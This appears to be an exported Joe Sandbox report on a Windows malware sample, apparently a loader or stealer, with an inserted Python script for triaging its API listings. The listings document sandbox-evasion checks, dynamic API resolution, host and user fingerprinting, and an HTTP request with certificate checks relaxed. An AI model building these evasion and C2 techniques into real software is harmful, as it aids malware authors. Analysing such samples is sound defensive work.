std::exception::exception 27466 e630a0 GetSystemPowerStatus 27489 e629a0 GetCurrentProcess IsWow64Process 27508 e523a9 298 API calls 27518 e54b29 303 API calls 27494 e63130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27509 e5abb2 120 API calls 27497 e416b9 200 API calls 27502 e4f639 144 API calls 27521 e4bf39 177 API calls 27467 e62880 10 API calls 27468 e64480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27469 e63480 6 API calls 27498 e63280 7 API calls 27483 e4100d GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27470 e58c88 16 API calls 27522 e4b309 98 API calls 27495 e64e35 8 API calls 27523 e47710 free ctype 27484 e62c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27524 e69711 128 API calls __setmbcp 27471 e6749e 5 API calls ctype 27473 e52499 290 API calls 27510 e4db99 672 API calls 27486 e68819 free free free __getptd 27511 e58615 47 API calls
APIs
• lstrcpy.KERNEL32(00000000,?), ref: 00E44C7F
• lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44CD2
• lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44D05
• lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44D35
• lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44D73
• lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44DA6
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E44DB6
Strings
Memory Dump Source
• Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 3f3da6db30aaebc5e24250ae462c373d1aa36c175c5c13fa390dba12a11ff629
                                • Instruction ID: 08b965cc94f36bbccb11c36e39b4b2d6455f1ee8cfce58364987e41da1816d84
                                • Opcode Fuzzy Hash: 3f3da6db30aaebc5e24250ae462c373d1aa36c175c5c13fa390dba12a11ff629
                                • Instruction Fuzzy Hash: 62528E72E112159BCB21EFA4EC49BAE7BF9AF44314F146028F945F7241DB34ED428BA0

                                 Control-flow Graph (basic blocks as id, address range, APIs called; -> lists successor blocks)
                                 • 2125 e66390-e663bd GetPEB -> 2126, 2127
                                 • 2127 e663c3-e665be call e662f0 GetProcAddress * 20 -> 2126
                                 • 2126 e665c3-e66623 LoadLibraryA * 5 -> 2128, 2129
                                 • 2128 e66625-e66633 GetProcAddress -> 2129
                                 • 2129 e66638-e6663f -> 2131, 2132
                                 • 2131 e66641-e66667 GetProcAddress * 2 -> 2132
                                 • 2132 e6666c-e66673 -> 2134, 2135
                                 • 2134 e66675-e66683 GetProcAddress -> 2135
                                 • 2135 e66688-e6668f -> 2137, 2138
                                 • 2138 e66691-e6669f GetProcAddress -> 2137
                                 • 2137 e666a4-e666ab -> 2139, 2140
                                 • 2140 e666ad-e666d2 GetProcAddress * 2 -> 2139
                                 • 2139 e666d7-e666da (return)
                                APIs
                                • GetProcAddress.KERNEL32(77190000,016C15E8), ref: 00E663E9
                                • GetProcAddress.KERNEL32(77190000,016C1600), ref: 00E66402
                                • GetProcAddress.KERNEL32(77190000,016C1768), ref: 00E6641A
                                • GetProcAddress.KERNEL32(77190000,016C1720), ref: 00E66432
                                • GetProcAddress.KERNEL32(77190000,016C8B08), ref: 00E6644B
                                • GetProcAddress.KERNEL32(77190000,016B53A8), ref: 00E66463
                                • GetProcAddress.KERNEL32(77190000,016B54A8), ref: 00E6647B
                                • GetProcAddress.KERNEL32(77190000,016C1618), ref: 00E66494
                                • GetProcAddress.KERNEL32(77190000,016C1738), ref: 00E664AC
                                • GetProcAddress.KERNEL32(77190000,016C16A8), ref: 00E664C4
                                • GetProcAddress.KERNEL32(77190000,016C1690), ref: 00E664DD
                                • GetProcAddress.KERNEL32(77190000,016B5688), ref: 00E664F5
                                • GetProcAddress.KERNEL32(77190000,016C16C0), ref: 00E6650D
                                • GetProcAddress.KERNEL32(77190000,016C1780), ref: 00E66526
                                • GetProcAddress.KERNEL32(77190000,016B53C8), ref: 00E6653E
                                • GetProcAddress.KERNEL32(77190000,016C17C8), ref: 00E66556
                                • GetProcAddress.KERNEL32(77190000,016C1798), ref: 00E6656F
                                • GetProcAddress.KERNEL32(77190000,016B54C8), ref: 00E66587
                                • GetProcAddress.KERNEL32(77190000,016C1810), ref: 00E6659F
                                • GetProcAddress.KERNEL32(77190000,016B56E8), ref: 00E665B8
                                • LoadLibraryA.KERNEL32(016C18B8,?,?,?,00E61C03), ref: 00E665C9
                                • LoadLibraryA.KERNEL32(016C17F8,?,?,?,00E61C03), ref: 00E665DB
                                • LoadLibraryA.KERNEL32(016C1828,?,?,?,00E61C03), ref: 00E665ED
                                • LoadLibraryA.KERNEL32(016C1840,?,?,?,00E61C03), ref: 00E665FE
                                • LoadLibraryA.KERNEL32(016C1858,?,?,?,00E61C03), ref: 00E66610
                                • GetProcAddress.KERNEL32(76850000,016C1870), ref: 00E6662D
                                • GetProcAddress.KERNEL32(77040000,016C1888), ref: 00E66649
                                • GetProcAddress.KERNEL32(77040000,016C18A0), ref: 00E66661
                                • GetProcAddress.KERNEL32(75A10000,016C8FC0), ref: 00E6667D
                                • GetProcAddress.KERNEL32(75690000,016B56A8), ref: 00E66699
                                • GetProcAddress.KERNEL32(776F0000,016C8AB8), ref: 00E666B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00E666CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 00E666C1
                                 Memory Dump Source
                                 • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true (associated dumps: same list as for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 029c898e2efa4b3da8f1538b01074edb55d2589cb7a0643d4c920768e13d63eb
                                • Instruction ID: 85c7951f497087d4faa6bb763d74160551ccd869d90700ffbc508672326cbf0c
                                • Opcode Fuzzy Hash: 029c898e2efa4b3da8f1538b01074edb55d2589cb7a0643d4c920768e13d63eb
                                • Instruction Fuzzy Hash: 2AA153B5E612049FD775DF64E44CA2A37B9F788768310891AF995E3348D73EA800DFA0

                                 Control-flow Graph (basic blocks as id, address range, APIs called; -> lists successor blocks)
                                 • 2141 e61bf0-e61c0b call e42a90 call e66390 -> 2146, 2147
                                 • 2146 e61c0d -> 2148
                                 • 2148 e61c10-e61c18 -> 2147, 2148
                                 • 2147 e61c1a-e61c27 call e42930 -> 2151, 2152
                                 • 2152 e61c29-e61c2f lstrcpy -> 2151
                                 • 2151 e61c35-e61c63 -> 2156, 2157
                                 • 2156 e61c65-e61c67 ExitProcess
                                 • 2157 e61c6d-e61c7b GetSystemInfo -> 2158, 2159
                                 • 2159 e61c7d-e61c7f ExitProcess
                                 • 2158 e61c85-e61ca0 call e41030 call e410c0 GetUserDefaultLangID -> 2164, 2165
                                 • 2164 e61ca2-e61ca9 -> 2165, 2166
                                 • 2166 e61cb0-e61cb2 ExitProcess
                                 • 2165 e61cb8-e61cca call e62ad0 call e63e10 -> 2171, 2172
                                 • 2172 e61ccc-e61cde call e62a40 call e63e10 -> 2171, 2183
                                 • 2183 e61ce0-e61ce1 ExitProcess
                                 • 2171 e61ce7-e61d06 lstrlen call e42930 -> 2178, 2179
                                 • 2179 e61d08-e61d0d -> 2178, 2181
                                 • 2181 e61d0f-e61d11 -> 2178, 2184
                                 • 2184 e61d13-e61d1d lstrcpy lstrcat -> 2178
                                 • 2178 e61d23-e61d40 lstrlen call e42930 -> 2186, 2187
                                 • 2186 e61d42-e61d44 -> 2187, 2189
                                 • 2189 e61d46-e61d54 lstrcpy lstrcat -> 2187
                                 • 2187 e61d5a-e61d7b call e62ad0 lstrlen call e42930 -> 2193, 2194
                                 • 2193 e61d7d-e61d7f -> 2194, 2195
                                 • 2195 e61d81-e61d85 -> 2194, 2197
                                 • 2197 e61d87-e61d94 lstrcpy lstrcat -> 2194
                                 • 2194 e61d9a-e61db4 lstrlen call e42930 -> 2199, 2200
                                 • 2199 e61db6-e61db8 -> 2200, 2201
                                 • 2201 e61dba-e61dc8 lstrcpy lstrcat -> 2200
                                 • 2200 e61dce-e61deb call e62a40 lstrlen call e42930 -> 2206, 2207
                                 • 2206 e61ded-e61def -> 2207, 2208
                                 • 2208 e61df1-e61df5 -> 2207, 2211
                                 • 2211 e61df7-e61e04 lstrcpy lstrcat -> 2207
                                 • 2207 e61e0a-e61e0f -> 2209, 2210
                                 • 2210 e61e11 call e42a20 -> 2209
                                 • 2209 e61e16-e61e22 call e42930 -> 2215, 2216
                                 • 2215 e61e24-e61e26 -> 2216, 2217
                                 • 2217 e61e28-e61e2a lstrcpy -> 2216
                                 • 2216 e61e30-e61e66 call e42a20 * 5 OpenEventA -> 2228, 2229
                                 • 2229 e61e68-e61e8a CloseHandle Sleep OpenEventA -> 2228, 2229
                                 • 2228 e61e8c-e61ea0 CreateEventA call e61b20 call e5ffd0 -> 2233
                                 • 2233 e61ea5-e61eae CloseHandle ExitProcess
                                APIs
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C15E8), ref: 00E663E9
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1600), ref: 00E66402
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1768), ref: 00E6641A
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1720), ref: 00E66432
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C8B08), ref: 00E6644B
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016B53A8), ref: 00E66463
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016B54A8), ref: 00E6647B
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1618), ref: 00E66494
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1738), ref: 00E664AC
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C16A8), ref: 00E664C4
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1690), ref: 00E664DD
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016B5688), ref: 00E664F5
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C16C0), ref: 00E6650D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E61C2F
                                • ExitProcess.KERNEL32 ref: 00E61C67
                                • GetSystemInfo.KERNEL32(?), ref: 00E61C71
                                • ExitProcess.KERNEL32 ref: 00E61C7F
                                  • Part of subcall function 00E41030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E41046
                                  • Part of subcall function 00E41030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E4104D
                                  • Part of subcall function 00E41030: ExitProcess.KERNEL32 ref: 00E41058
                                  • Part of subcall function 00E410C0: GlobalMemoryStatusEx.KERNEL32 ref: 00E410EA
                                  • Part of subcall function 00E410C0: ExitProcess.KERNEL32 ref: 00E41114
                                • GetUserDefaultLangID.KERNEL32 ref: 00E61C8F
                                • ExitProcess.KERNEL32 ref: 00E61CB2
                                • ExitProcess.KERNEL32 ref: 00E61CE1
                                • lstrlen.KERNEL32(016C8AE8), ref: 00E61CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E61D15
                                • lstrcat.KERNEL32(00000000,016C8AE8), ref: 00E61D1D
                                • lstrlen.KERNEL32(00E74B98), ref: 00E61D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61D48
                                • lstrcat.KERNEL32(00000000,00E74B98), ref: 00E61D54
                                • lstrlen.KERNEL32(00000000), ref: 00E61D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61D94
                                • lstrlen.KERNEL32(00E74B98), ref: 00E61D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61DBC
                                • lstrcat.KERNEL32(00000000,00E74B98), ref: 00E61DC8
                                • lstrlen.KERNEL32(00000000), ref: 00E61DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61E04
                                 Memory Dump Source
                                 • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true (associated dumps: same list as for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 49a9ab31085c1ca3df59a57f9bb18360b6f30be947cff30cbd481e7e852e913b
                                • Instruction ID: 8da85cdcf622e4c1f2b77662d9a179550a0c47c91ef6d691f974c275301b2c3d
                                • Opcode Fuzzy Hash: 49a9ab31085c1ca3df59a57f9bb18360b6f30be947cff30cbd481e7e852e913b
                                • Instruction Fuzzy Hash: 3171D731990205AFC732AFB0FC4DB6E76B9AF44795F089068FA46B6145DB75DC01CB60

                                 Control-flow Graph (basic blocks as id, address range, APIs called; -> lists successor blocks)
                                 • 2234 e46c40-e46c64 call e42930 -> 2237, 2238
                                 • 2238 e46c66-e46c6b -> 2237, 2239
                                 • 2239 e46c6d-e46c6f lstrcpy -> 2237
                                 • 2237 e46c75-e46c97 call e44bc0 -> 2242, 2243
                                 • 2242 e46c99 -> 2244
                                 • 2244 e46ca0-e46ca8 -> 2243, 2244
                                 • 2243 e46caa-e46cba call e42930 -> 2247, 2248
                                 • 2247 e46cbc-e46cc2 lstrcpy -> 2248
                                 • 2248 e46cc8-e46cf5 InternetOpenA StrCmpCA -> 2249, 2250
                                 • 2249 e46cf7 -> 2250
                                 • 2250 e46cfa-e46cfc -> 2251, 2252
                                 • 2251 e46d02-e46d22 InternetConnectA -> 2253, 2254
                                 • 2254 e46d28-e46d5d HttpOpenRequestA -> 2256, 2257
                                 • 2257 e46d63-e46d65 -> 2259, 2260
                                 • 2259 e46d67-e46d77 InternetSetOptionA -> 2260
                                 • 2260 e46d7d-e46dad HttpSendRequestA HttpQueryInfoA -> 2263, 2264
                                 • 2264 e46daf-e46dd3 call e671e0 call e42a20 * 2
                                 • 2263 e46dd4-e46de4 call e63d90 -> 2264, 2275
                                 • 2275 e46de6-e46de8 -> 2276, 2277
                                 • 2277 e46dee-e46e07 InternetReadFile -> 2276, 2279
                                 • 2279 e46e0d -> 2281
                                 • 2281 e46e10-e46e15 -> 2276, 2283
                                 • 2283 e46e17-e46e3d call e67310 -> 2286, 2287
                                 • 2287 e46e3f call e42a20 -> 2286
                                 • 2286 e46e44-e46e51 call e42930 -> 2291, 2292
                                 • 2292 e46e53-e46e57 -> 2291, 2293
                                 • 2293 e46e59-e46e5b lstrcpy -> 2291
                                 • 2291 e46e61-e46e8b call e42a20 InternetReadFile -> 2276, 2281
                                 • 2276 e46e8d-e46e8e InternetCloseHandle -> 2256
                                 • 2256 e46e94-e46e9e InternetCloseHandle -> 2253
                                 • 2253 e46ea1-e46ea2 InternetCloseHandle -> 2252
                                 • 2252 e46ea8-e46ebb call e42930 -> 2261, 2262
                                 • 2261 e46ebd-e46ebf -> 2262, 2265
                                 • 2265 e46ec1-e46ec3 lstrcpy -> 2262
                                 • 2262 e46ec9-e46ee0 call e42a20 * 2 (return)
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E46C6F
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E46CC2
                                • InternetOpenA.WININET(00E6CFEC,00000001,00000000,00000000,00000000), ref: 00E46CD5
                                • StrCmpCA.SHLWAPI(?,016CF2C8), ref: 00E46CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,016CEDE0,00000000,00000000,-00400100,00000000), ref: 00E46D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00E46D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00E46DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E46DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E46E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00E46E7D
                                • InternetCloseHandle.WININET(00000000), ref: 00E46E8E
                                • InternetCloseHandle.WININET(?), ref: 00E46E98
                                • InternetCloseHandle.WININET(00000000), ref: 00E46EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46EC3
                                 Memory Dump Source
                                 • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true (associated dumps: same list as for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: 47055ef745f8d7910f4d73d9d14993f069a1d0a601adcc6dccca237e6ec120c9
                                • Instruction ID: d9c3607699f58560e15e9e87bb5226531d68cc9b667bf3356ebe5bae6e14f407
                                • Opcode Fuzzy Hash: 47055ef745f8d7910f4d73d9d14993f069a1d0a601adcc6dccca237e6ec120c9
                                • Instruction Fuzzy Hash: DD819071E50215ABEB20DFA4EC49FAEB7F8AF44714F145029FA45F7280DB74AE048B91
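The two listings above, 00E61BF0 (environment probes, each followed by ExitProcess) and 00E46C40 (the WinINet GET, including InternetSetOptionA on option 0000001F), can be triaged mechanically from the report text. The following Python is an added example and is not part of the Joe Sandbox report or of the sample: it parses lines in the report's "APIs" format, pairs each ExitProcess with the probe that ran before it in the same function or subcall, decodes the SECURITY_FLAG_IGNORE_* bits passed to INTERNET_OPTION_SECURITY_FLAGS, and reconstructs the request shape from the argument columns. The sample input is copied from the listings above. The constant names and values are taken from wininet.h (0x00010000, SECURITY_FLAG_IGNORE_WEAK_SIGNATURE, is the one to double-check against your SDK), and reading GetSystemInfo, GlobalMemoryStatusEx, VirtualAllocExNuma and GetUserDefaultLangID as processor-count, RAM, NUMA and locale checks is an interpretation; the report itself only states the locale-based exit.

```python
import re
from typing import Optional

# One line of a Joe Sandbox "APIs" listing, e.g.
#   • GetSystemInfo.KERNEL32(?), ref: 00E61C71
#   • Part of subcall function 00E41030: ExitProcess.KERNEL32 ref: 00E41058
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})"
)

def parse_api_lines(text: str) -> list:
    """Each call -> {"api", "module", "args", "ref", "sub"}; "sub" is the callee address on subcall lines."""
    calls = []
    for m in (LINE_RE.search(line) for line in text.splitlines()):
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append({"api": m["api"], "module": m["mod"], "args": args,
                          "ref": m["ref"], "sub": m["sub"]})
    return calls

def hexarg(a: str) -> Optional[int]:
    """Numeric arguments are printed as 8-digit hex; '?' or a literal such as GET gives None."""
    try:
        return int(a, 16)
    except ValueError:
        return None

# Constructed input: lines copied from this report's listings for 00E61BF0 and 00E46C40.
ENTRY_APIS = """
• GetSystemInfo.KERNEL32(?), ref: 00E61C71
• ExitProcess.KERNEL32 ref: 00E61C7F
• Part of subcall function 00E41030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E4104D
• Part of subcall function 00E41030: ExitProcess.KERNEL32 ref: 00E41058
• Part of subcall function 00E410C0: GlobalMemoryStatusEx.KERNEL32 ref: 00E410EA
• Part of subcall function 00E410C0: ExitProcess.KERNEL32 ref: 00E41114
• GetUserDefaultLangID.KERNEL32 ref: 00E61C8F
• ExitProcess.KERNEL32 ref: 00E61CB2
"""
HTTP_APIS = """
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46D15
• HttpOpenRequestA.WININET(00000000,GET,?,016CEDE0,00000000,00000000,-00400100,00000000), ref: 00E46D50
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00E46D77
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00E46DA5
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E46DFF
"""

def exit_gates(calls: list) -> list:
    """Pair each ExitProcess with the last API run before it in the same scope
    (main body or one subcall) since the previous ExitProcess; in 00E61BF0 these
    are the environment probes the loader exits on."""
    gates, last = [], {}
    for c in calls:
        scope = c["sub"] or "main"
        if c["api"] == "ExitProcess":
            gates.append((last.pop(scope, None), c["ref"]))
        else:
            last[scope] = c["api"]
    return gates

INTERNET_SERVICE_HTTP = 3
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
HTTP_QUERY_STATUS_CODE = 0x13
SECURITY_IGNORE_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00004000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00008000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00010000: "SECURITY_FLAG_IGNORE_WEAK_SIGNATURE",  # value per current wininet.h; verify in your SDK
}

def tls_downgrade(calls: list) -> list:
    """(ref, named SECURITY_FLAG_IGNORE_* bits, unmapped bits) for every
    InternetSetOptionA(h, INTERNET_OPTION_SECURITY_FLAGS, &flags, 4). Any hit means
    the client will accept an untrusted certificate from the C2 host."""
    hits = []
    for c in calls:
        if c["api"] == "InternetSetOptionA" and len(c["args"]) >= 3 \
                and hexarg(c["args"][1]) == INTERNET_OPTION_SECURITY_FLAGS:
            value = hexarg(c["args"][2]) or 0
            names = [n for bit, n in SECURITY_IGNORE_FLAGS.items() if value & bit]
            hits.append((c["ref"], names, value & ~sum(SECURITY_IGNORE_FLAGS)))
    return hits

def wininet_summary(calls: list) -> dict:
    """Request shape from the argument columns: dwService (InternetConnectA arg 6),
    verb (HttpOpenRequestA arg 2), status-code query, InternetReadFile chunk size."""
    s = {}
    for c in calls:
        api, a = c["api"], c["args"]
        if api == "InternetConnectA" and len(a) >= 6:
            s["service"] = "HTTP" if hexarg(a[5]) == INTERNET_SERVICE_HTTP else a[5]
        elif api == "HttpOpenRequestA" and len(a) >= 2:
            s["verb"] = a[1]
        elif api == "HttpQueryInfoA" and len(a) >= 2 and hexarg(a[1]) == HTTP_QUERY_STATUS_CODE:
            s["checks_status_code"] = True
        elif api == "InternetReadFile" and len(a) >= 3:
            s["read_chunk"] = hexarg(a[2])
    return s
```

On the listings above this yields four probe-then-exit gates (GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx, GetUserDefaultLangID), one security-flags downgrade at 00E46D77 (IGNORE_UNKNOWN_CA, IGNORE_WRONG_USAGE and IGNORE_WEAK_SIGNATURE, with no unmapped bits), and an HTTP GET whose status code is checked with HTTP_QUERY_STATUS_CODE and whose body is read in 0x7CF-byte chunks. Note from the graph that block 2259 (the InternetSetOptionA call) is reached only on one of the two branches out of 2257, so the certificate-check downgrade is conditional rather than unconditional in this function.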

                                 Control-flow Graph (basic blocks as id, address range, APIs called; -> lists successor blocks)
                                 • 2850 e44a60-e44afc RtlAllocateHeap -> 2867, 2868
                                 • 2867 e44afe-e44b03 -> 2869
                                 • 2869 e44b06-e44b78 -> 2868
                                 • 2868 e44b7a-e44bbe VirtualProtect (return)
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E44AA2
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00E44BB0
                                 Memory Dump Source
                                 • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true (associated dumps: same list as for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 1115c04d1c9ab17c8ddf231512557a5633ad6528c54d57e3a452dea0e74ea7b6
                                • Instruction ID: 6dfa7a460b4cc6e144ee2e7560bae80f2fb313557e42b9a33c39c517eebac93f
                                • Opcode Fuzzy Hash: 1115c04d1c9ab17c8ddf231512557a5633ad6528c54d57e3a452dea0e74ea7b6
                                • Instruction Fuzzy Hash: 2131C39AB803BF768620EBEF4C4BB5FAE55DFC5760B02E056760C771C18BA15500CAA2

                                 Control-flow Graph (basic blocks as id, address range, APIs called; -> lists successor blocks)
                                 • 2957 e62ad0-e62b22 GetProcessHeap RtlAllocateHeap GetComputerNameA -> 2958, 2959
                                 • 2959 e62b24-e62b36
                                 • 2958 e62b44-e62b59
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E62AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E62B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00E62B1A
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 36dfb3273fc5cc9f46dbc4687c7caae7d34c15f62a93e0a0f93b31d9fb85f711
                                • Instruction ID: 2cfc8cb1a9bff45802d95da9c74710ee940cce1c22ac5ec73152cef5a93110c0
                                • Opcode Fuzzy Hash: 36dfb3273fc5cc9f46dbc4687c7caae7d34c15f62a93e0a0f93b31d9fb85f711
                                • Instruction Fuzzy Hash: 13018F72E44608ABD710CF99E945B99F7A8F744B65F00026AF919E2780D779190087A1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E62A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E62A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00E62A8A
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: ee7f1866a062e9645d59edfb7ca71bfdc6ec8e68214fef41fdddcb62dd14bb1a
                                • Instruction ID: 3362636aeac12cf48e9e08299a9afd4d7925b4bbb0c077788a9ae9db1d3a0664
                                • Opcode Fuzzy Hash: ee7f1866a062e9645d59edfb7ca71bfdc6ec8e68214fef41fdddcb62dd14bb1a
                                • Instruction Fuzzy Hash: 35F090B1E40204AFC710DB88DD49F9EBBBCF704B21F000226FA15E2280D37919048BE1

                                Control-flow Graph (legend: Executed / Not Executed; graph rendering not reproduced in this text export)

                                APIs
                                • GetProcAddress.KERNEL32(77190000,016B5668), ref: 00E666F5
                                • GetProcAddress.KERNEL32(77190000,016B5548), ref: 00E6670D
                                • GetProcAddress.KERNEL32(77190000,016C8D08), ref: 00E66726
                                • GetProcAddress.KERNEL32(77190000,016C8D50), ref: 00E6673E
                                • GetProcAddress.KERNEL32(77190000,016C8F48), ref: 00E66756
                                • GetProcAddress.KERNEL32(77190000,016CD220), ref: 00E6676F
                                • GetProcAddress.KERNEL32(77190000,016BA848), ref: 00E66787
                                • GetProcAddress.KERNEL32(77190000,016CD190), ref: 00E6679F
                                • GetProcAddress.KERNEL32(77190000,016CD148), ref: 00E667B8
                                • GetProcAddress.KERNEL32(77190000,016CD3E8), ref: 00E667D0
                                • GetProcAddress.KERNEL32(77190000,016CD208), ref: 00E667E8
                                • GetProcAddress.KERNEL32(77190000,016B5448), ref: 00E66801
                                • GetProcAddress.KERNEL32(77190000,016B5708), ref: 00E66819
                                • GetProcAddress.KERNEL32(77190000,016B53E8), ref: 00E66831
                                • GetProcAddress.KERNEL32(77190000,016B5568), ref: 00E6684A
                                • GetProcAddress.KERNEL32(77190000,016CD298), ref: 00E66862
                                • GetProcAddress.KERNEL32(77190000,016CD1A8), ref: 00E6687A
                                • GetProcAddress.KERNEL32(77190000,016BA758), ref: 00E66893
                                • GetProcAddress.KERNEL32(77190000,016B5408), ref: 00E668AB
                                • GetProcAddress.KERNEL32(77190000,016CD400), ref: 00E668C3
